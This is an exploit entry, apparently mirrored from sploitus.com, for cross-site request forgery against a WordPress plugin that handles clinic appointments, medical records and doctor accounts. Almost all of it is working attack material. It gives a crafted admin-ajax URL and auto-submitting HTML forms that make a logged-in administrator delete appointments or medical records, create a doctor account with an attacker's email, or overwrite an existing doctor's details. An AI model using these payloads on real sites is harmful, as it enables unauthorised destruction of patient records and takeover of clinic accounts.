## https://sploitus.com/exploit?id=WPEX-ID:E0741E2C-C529-4815-8744-16E01CDB0AED
Make a logged in admin open the following URL to make them delete the appointment with ID 1: https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=appointment_delete&id=1
Make a logged in admin open a page with the HTML code below
To make them delete the medial record with ID 1:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="route_name" value="medical_records_delete"/>
<input type="text" name="id" value="1">
<input type="submit" value="submit">
</form>
</body>
To make them create a new doctor:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="user_email" value="attacker@domain.com">
<input type="text" name="first_name" value="Attacker">
<input type="text" name="last_name" value="Via CSRF">
<input type="text" name="mobile_number" value="1">
<input type="text" name="gender" value="other">
<input type="submit" value="submit">
</form>
</body>
To edit an existing doctor, add the ID and the correct email to the code above, e.g
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="ID" value="8">
<input type="text" name="user_email" value="attacker@domain.com">
<input type="text" name="first_name" value="Attacker">
<input type="text" name="last_name" value="Via CSRF">
<input type="text" name="mobile_number" value="1">
<input type="text" name="gender" value="other">
<input type="submit" value="submit">
</form>
</body>
(This will change their name, mobile number and gender as well as reset their specialisation etc)